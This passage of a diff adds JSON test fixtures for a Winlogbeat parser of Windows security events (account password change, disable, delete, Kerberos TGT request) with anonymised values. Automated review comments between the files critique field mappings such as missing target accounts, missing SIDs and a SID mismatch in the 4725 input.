"opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + 
"provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042939152", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json new file mode 100644 index 000000000..ac581308e --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4723.json 
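Review bot: The expected output pins `related.user` to only the subject `account-name`, while the account that was actually enabled, `ACC_NAME`, appears solely under `user.target.name`, and `user.target` has no `id` even though `winlog.event_data.TargetSid` is `S-1-2-3-4-5`. For a 4722 the target account is the pivot an analyst searches on, so a fixture that omits it from `related.user` locks in a gap rather than guarding against it. If the parser is adjusted, the fixture should expect `"related": { "hosts": ["pc01"], "ip": ["1.2.3.4"], "user": ["account-name", "ACC_NAME"] }` and `"target": { "domain": "DOMAIN", "id": "S-1-2-3-4-5", "name": "ACC_NAME" }`. Note also that `event.action` is passed through as the task name `User Account Management`, so consumers must key on `action.id` / `event.code` rather than `event.action` to tell 4722 apart from the other account-management events in this change.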
@@ -0,0 +1,112 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount 
Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 
Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4723", + "kind": "event", + "module": "security", + "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:59:04.757000Z", + "action": { + "id": 4723, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a28ebbf", + "SubjectUserName": "ACCOUNT", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "123456-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": 
"PC01.domain.com", + "event_id": "4723", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a28ebbf" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13043050897", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json new file mode 100644 index 000000000..d3826be97 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4725.json 
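Review bot: This fixture only exercises the `Audit Success` / `event.outcome: success` path of 4723, yet the failed password-change attempt (wrong old password, reported under the failure keyword) is the variant that matters for detecting guessing against a known account, and nothing here pins how `event.outcome` is derived for it. A companion fixture with `"keywords":["Audit Failure"]` in the input and `"outcome": "failure"` in the expected output would cover that branch. Separately, `user.target` again lacks `id` although `TargetSid` `S-1-2-3` is available in `action.properties`; expecting `"target": { "domain": "DOMAIN", "id": "S-1-2-3", "name": "ACCOUNT" }` would keep the SID, which survives renames, alongside the name. Because subject and target are the same principal in this sample, the fixture cannot show whether `user.target` is filled from the Target* fields or copied from the subject; the 4722 and 4725 fixtures cover that distinction, so it is acceptable here as long as they stay.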
@@ -0,0 +1,111 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was 
disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4725", + "kind": "event", + "module": "security", + 
"original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:41:11.055000Z", + "action": { + "id": 4725, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x493fa12d", + "SubjectUserName": "jdoe", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-4-5-6", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "jdoe", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4725", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x493fa12d" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 7304 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": 
"13042691344", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json new file mode 100644 index 000000000..73c1d823c --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4726.json 
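Review bot: The input is internally inconsistent: `event.original` and `message` give the target `Security ID` as `S-1-2-3-4-5`, but `winlog.event_data.TargetSid` is `S-4-5-6`, and the expected `action.properties.TargetSid` follows the structured field. That is presumably an anonymisation slip, but it means this fixture would not catch a regression where the parser starts reading the SID from the message text instead of `event_data`, since the two values differ silently. Align them by setting `"TargetSid":"S-1-2-3-4-5"` in both the input `event_data` and the expected `action.properties`. As in the sibling fixtures, the disabled account `ACCOUNT` should also be expected in `related.user` next to the subject `jdoe`, and `user.target` should carry the SID as `id`.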
@@ -0,0 +1,84 @@ +{ + "input": { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": 
"{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "event": { + "action": "User Account Management", + "code": "4726", + "kind": "event", + "module": "security", + "original": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget 
Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T07:58:13.288000Z", + "action": { + "id": 4726, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3005c1f76", + "SubjectUserName": "doe.j", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "smithee.a" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-ABCD-ef90-1234-abcdef123456", + "name": "hostname", + "type": "winlogbeat", + "version": "7.17.1" + }, + "host": { + "name": "hostname.domain.net" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "doe.j" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "doe.j", + "target": { + "domain": "DOMAIN", + "name": "smithee.a" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.domain.net", + "event_id": "4726", + "logon": { + "id": "0x3005c1f76" + }, + "process": { + "pid": 632, + "thread": { + "id": 2056 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "25349190364", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json new file mode 100644 index 000000000..c7ac196ea --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4768.json 
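Review bot: The expected output for this winlogbeat 7.17 input has `host.name` set to `hostname.domain.net` but no `host.hostname` and no `related.hosts`, whereas the 4722–4725 fixtures (filebeat 8.14 input) populate both, so anything downstream that pivots on `host.hostname` gets an empty value for this very common 7.x input shape. Consider having the parser fall back to `winlog.computer_name` (present here as `hostname.domain.net`) and pinning `"host": { "hostname": "hostname.domain.net", "name": "hostname.domain.net" }` in the fixture. The deleted account `smithee.a` is likewise missing from `related.user`, which only lists the deleting subject `doe.j`; on a domain controller (the input is tagged `domain-controller`) the deleted account is what an investigator will search for. Finally, this input carries no `winlog.keywords`, so the `event.outcome: success` in the expected output appears to come straight from the input's own `event.outcome`; if that is the case, a short comment in the PR description stating that outcome is passed through when keywords are absent would save the next maintainer from guessing.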
@@ -0,0 +1,102 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte 